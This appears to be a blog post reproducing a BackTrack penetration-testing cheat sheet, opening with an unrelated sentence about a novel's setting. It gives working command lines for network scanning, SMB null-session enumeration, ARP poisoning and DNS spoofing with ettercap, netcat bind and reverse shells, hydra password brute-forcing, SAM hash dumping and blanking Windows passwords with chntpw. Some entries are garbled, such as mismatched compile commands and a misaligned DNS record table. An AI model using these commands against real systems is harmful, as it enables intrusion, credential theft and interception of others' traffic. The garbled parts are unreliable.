Set in London of AD 2540 (632 A.F. in the book), the novel anticipates developments in reproductive technology and sleep-learning that combine to change society.

BACKTRACK CHEAT SHEET\

\b NETWORKING\

\b0 ===========\
\
dhclient                                            get a new IP Address\
\
OR\
\
/etc/init.d/networking start                            get a new IP Address\
\
Static IP Address:\
—————————\

\b set IP Address & subnet mask:\

\b0     \
ifconfig eth0 192.168.200.1/24\
\

\b Set the default gateway:\

\b0 \
route add default gw 192.168.200.1\
\

\b Set the DNS server:\

\b0     \
echo nameserver 192.168.200.1 > /etc/resolv.conf\
\
\
\
\
IP Tables\
————\
iptables -t nat -f\
deletes any iptables rules\
\
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 10000\
setup a rule that redirects all traffic from port 80 to port 10000\
\
iptables –list\
lists all iptables rules\
\
\
Port forwarding\
——————–\
echo 1 > /proc/sys/net/ipv4/ip_forward\
enables port forwarding\
\
echo 0 > /proc/sys/net/ipv4/ip_forward\
disables port forwarding\
\
\

\b SERVICES\

\b0 =========\
\
Apache server:\
———————-\
apachectl start                                    start server on TCP port 80\
apachectl stop                                        stop server\
\
SSH server:\
——————\
sshd-generate                                        generate ssh keys\
/usr/sbin/sshd                                        start server on TCP port 22\
pkill sshd                                            stop server\
\
ssh user@targetIP\
connect to the SSH service\
\
TFTP server:\
——————-\
atftp –daemon –port 69 /tmp/                            start server on UDP port 69 with root directory of tmp\
pkill tftd                                            stop server\
\
VNC server:\
——————\
vncserver                                        start server on TCP port 5901\
pkill Xvnc                                        stop server\
\
Check what ports are listening?:\
———————————————–\
netstat -ant                                        show listening TCP ports\
netstat -anu                                        show listening UDP ports\
netstat -ant | grep 22                                verify SSH has started\
netstat -anu | grep 69                                verify TFTP has started\
\
\

\b BASICS\

\b0 ======\
\
Mount a local hard drive:\
————————————\
mount /dev/hda1 /mnt/hda1\
ls -l /mnt/hda1\
\
Mount a Windows network share:\
————————————————\
share <user><targetIP><remote share>\
share admin 192.168.200.1 c$\
Enter a password for the remote share.\
ls -l /mnt/share/\
\
unmount /mnt/share                                unmount share\
\
Edit a file:\
—————\
nano test.sh                                        create a new file and open it\
<ctrl> x                                            exit\
y                                                save modified buffer\
<enter>                                            write changes\
chmod 755 test.sh                                    make the file executable\
./test.sh                                            run the file\
\
Compile a program:\
—————————-\
*example of a program as an exploit written in C\
\
gcc -o newname exploit.c\
gcc -o doom 66.c\
./dcom\
\
Install a new program:\
——————————–\
tar zxvf program.tar.gz\
cd to the new program folder                            method 2: bzip2 -cd program.tar.bz2 | tar xvf-\
./configure\
make\
su root\
make install\
\
\

\b FOOTPRINTING\

\b0 =============\
\
Whois:\
———-\
whois target.com                                    contact info, emails, dates, name servers\
ping http://www.target.com                                IP Address of server\
whois targetIP                                        network range\
\
DNS:\
——–\
dig target.com any\
\
A                                                maps a domain to an IP Address\
PTR                    host                            maps an IP Address to a domain\
NS                    pointer                        server name for a delegated zone\
SOA                    name server                    zone transfer and record caching\
SRV                    start of authority                used to locate services in the network\
MX                    service locator                    SMTP server\
mail\
\
host -l target.com <name server>                        zone transfer\
\
\

\b SCANNING\

\b0 =========\
\
scanrand -b10M targetIP:quick\
\
Nmap:\
———\
-sS        TCP SYN scan or Stealth, half open (default)\
-sT        TCP full connect (very noisy)\
-sU        UDP scan\
\
-PS        SYN packet discovery (best against stageful firewalls)\
-PA        ACK packet discovery (best against stateless firewalls)\
-PN        don’t ping\
\
-n        no reverse DNS lookup\
\
-A        combines -O and -sV\
-O         OS fingerprinting\
-sV        service version (banner)\
-p        ports to scan (T:port, U:port)\
-T        timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane\
\
-iL        input list of hosts to scan\
-oG        grepable output to a file\
\
Examples:\
\
nmap -sS -PN -n targetIP\
\
nmap -sU -PN -n targetIP\
\
nmap -sT -PN -n targetIP -A -p open ports -T5 -oG scan.txt\
\
nmap -sS -p 135,139,445 targetIP\
\
nmap -sS -p T:1433,U:1434 targetIP\
\
\
amap:\
———\
amap -i scan.txt                                    take the results from nmap and check for services on uncommon ports\
\
\

\b OS FINGERPRINTING\

\b0 =================\
\
p0f -i eth0 -U -p                                    use interface eth0, don’t display unknown signatures, promiscuous\
point a browser to the targetIP                        reads traffic on p0f\
\
xprobe2 targetIP\
\
\

\b BANNER GRABBING\

\b0 ================\
\
nc targetIP port                                    check if the port is open\
\
nc 192.168.200.40                                    e.g.\
\
\
telnet targetIP port                                    telnet may yield slightly different results\
HEAD /HTTP/1.0\
<enter 2x>\
\
wget targetIP                                        downloads the index.html file\
cat index.html | more                                view file one page at a time, space bar for next page\
q                                                exit file\
\
\

\b WINDOWS ENUMERATION\

\b0 =====================\
\
nmap -sS -p 139,445 targetIP\
\
cd /pentest/enumeration/smb-enum\
nbtscan -f targetIP                                    check to see if NetBIOS is enabled\
smbgetserverinfo -i targetIP                            name, OS and workgroup\
smbdumpusers -i targetIP                            list users\
smbclient -L //targetIP                                list shares\
\
\

\b USING WINDOWS FROM BACKTRACK\

\b0 =============================\
\
net use \\\\targetIP\\ipc$ “” /u:””                        if possible, it will start a NULL session\
net view \\\\targetIP                                    view shares\
\
smbclient:\
—————\
smbclient -L hostname -l targetIP                        enumerate shares\
smbclient -L hostname/share -U “”                    connect to open share with a blank user name\
smbclient -L hostname -l targetIP -U admin                connect to open share with user name admin\
\
rpcclient:\
————-\
rpcclient targetIP -U “”                                if possible, it will start a NULL session\
netshareenum                                        enumerate shares\
enumdomusers                                    enumerate users\
lsaenumsid                                        enumerate domain SIDs\
queryuser RID                                        user info, try 500, 501, 512, 1000, 1001\
createdomuser                                    create user account\
\
\

\b ARP POISONING/SPOOFING\

\b0 =======================\
\
ettercap:\
————-\
nano /usr/local/etc/etter.conf\
\
Under the Linux section, uncomment both lines under iptables.\
\
\
Sniff > Unified sniffing > Network interface: eth0 > OK\
Hosts > Scan for hosts (do this two times)\
Hosts > Hosts list\
Select the default gateway > Add to Target 1\
Select the target > Add to Target 2\
Mitm > Arp poisoning > Sniff remote connections > OK\
Start > Start sniffing\
\
sniffers:\
———\
\
dsniff -i eth0\
\
urlsnarf -i eth0\
\
msgsnarf -i eth0\
\
driftnet -i eth0\
\
\
ARP Spoof:\
—————–\
Turn on packet forwarding;\
\
Linux:\
echo 1 > /proc/sys/net/ipv4/ip_forward\
\
BSD:\
sysctl -w net.inet.ip.forwarding=1\
\
\
Sniff traffic from both a target and gateway\
* The “& >/dev/nul” part is there to make it easier to run from one terminal but you may want to omit it for debugging purposes. Now we can use any package we wish to sniff the connection.\
\
arpspoof -t 192.168.200.1 192.168.200.32 & >/dev/null\
arpspoof -t 192.168.200.32 192.168.200.1 & >/dev/null\
\
Stop ARP Poisoning/Spoofing\
*this should stop the ARP Spoofing/Poisoning on both sides immediately\
\
killall arpspoof\
\
\
DNS spoofing:\
———————-\
nano /usr/local/share/ettercap/etter.dns\
\
Edit the Microsoft lines (target URL) to redirect to the attacker.\
\
\
Plugins > Manage the plugins > dns_spoof\
Mitm > Arp poisoning > Sniff remote connections > OK\
Start > Start sniffing\
\
\

\b EXPLOITS\

\b0 =========\
\
cd /pentest/exploits/milw0rm\
cat sploitlist.txt | grep -i [exploit]\
\
\
Some exploits may be written for compilation under Windows, while others for Linux.\
You can identify the environment by inspecting the headers.\
\
cat exploit | grep “#include”\
\
Windows:  process.h, string.h, winbase.h, windows.h, winsock2.h\
Linux:   arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h\
\
Grep out Windows headers, to leave only Linux based exploits:\
\
cat sploitlist.txt | grep -i exploit | cut -d ” ” -f1 | xargs grep sys | cut -d “:” -f1 | sort -u\
\
\

\b TFTP\

\b0 ====\
\
attack box 10.1.1.2\
cp /pentest/windows-binaries/tools/nc.exe /tmp/\
\
\
target box\
tftp -i 10.1.1.2 GET nc.exe\
\
\
TFTP copies files with read only attributes.  So to delete the file: \
attrib -r nc.exe\
del nc.exe\
\
\

\b NETCAT\

\b0 =======\
\
attack: 10.1.1.1\
target: 10.1.1.2\
\
port scanner:\
——————-\
nc -v -z 10.1.1.2 1-1024                                scans ports 1 to 1024 (very slow because of the -z, to speed up take -z out, but not as stealth)\
\
chat session:\
——————–\
target: nc -lvp 4444                                    start Netcat and listen verbosely on port 4444\
attacker: nc -v 10.1.1.2 4444                            \
\
transfer file to target:\
——————————\
target: nc -lvp 4444 > output.txt                        \
attacker: nc -v 10.1.1.2 4444 < test.txt\
\
Bind shell:\
—————-\
target: nc -lvp 4444 -e cmd.exe                        should be sitting at a command prompt of the target\
attacker: nc -v 10.1.1.2 4444                            \
\
Reverse shell:\
———————\
target: nc -lvp 4444\
attacker: nc -v 10.1.1.2 4444 -e /bin/bash\
\
The target should be sitting at an invisible command prompt of the attacker. You will not see the prompt. Issue any linux command to verify.\
\
\

\b PASSWORDS\

\b0 ===========\
\
Word list:\
————-\
zcat /pentest/password/dictionaries/wordlist.txt.Z > words\
cat words | wc -l                                             \
About 306,000 passwords.\
\
Brute force:\
——————\

\b ftp with a user name ftp\

\b0 hydra -l ftp -P words -v targetIP ftp\
\

\b pop3 with a user name muts\

\b0 hydra -l muts -P words -v targetIP pop3\
\

\b snmp
\b0 \
hydra -P words -v targetIP snmp\
\

\b Microsoft VPN\

\b0 nmap -p 1723 targetIP\
\

\b dos2unix words\

\b0 cat words | thc-pptp-bruter targetIP\
\
\

\b PHYSICAL ACCESS\

\b0 ================\
\
Mount a NTFS share in read/write mode:\
———————————————————–\
Boot your box with Backtrack.\
\
mount\
umount /mnt/hda1\
modprobe fuse\
ntfsmount /dev/hda1 /mnt/hda1\
mount\
ls -l /mnt/hda1\
\
\
Dump the SAM file:\
—————————-\
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt\
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt\
cat hash.txt\
\
\
Modify SAM file directly:\
————————————\
chntpw /mnt/sda1/WINDOWS/system32/config/SAM\
Blank the password.  *\
Do you really wish to change it?  y\
Write hive files?  y\
unmount /mnt/sda1\
reboot\
\
Accessing the Host/Guest Shared Folders via VMWare Image\
———————————————————————————-\
Location to go to from the VMWare image: /mnt/hgfs\
\
*Inside this location, will be the shared folders you have allowed from within the VMWare Settings.\
\
\
List All Unix Users\
————————\
To list all users on a Unix system, even the ones who are not logged in, look at the /etc/password file.how to list unix users How to List Unix Users\
\
\
$ cat /etc/passwd\
…\
george:*:1009:1009:George Washington:/home/george:/usr/bin/bash\
tom:*:1016:1016:Thomas Jefferson:/home/tom:/usr/bin/bash\
al:*:1017:1017:Alexander Hamilton:/home/alex:/usr/bin/bash\
…\
\
You can use the `cut` command to only see one field from the password file.\
\
For example, to just see the Unix user names, use the command “$ cat /etc/passwd | cut -d: -f1”.\
\
\
$ cat /etc/passwd | cut -d: -f1\
…\
george\
tom\
al\
…\
\
Or, to only see the GECOS field (i.e. the account holders real name), try this:\
\
\
$ cat /etc/passwd | cut -d: -f5\
…\
George Washinton\
Thomas Jefferson\
Alexander Hamilton\
…\
\
Note that you will also see Unix system accounts, such as “root”, “bin”, and “daemon” in the /etc/passwd file. These system accounts are not Unix users.\
\
\
\

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s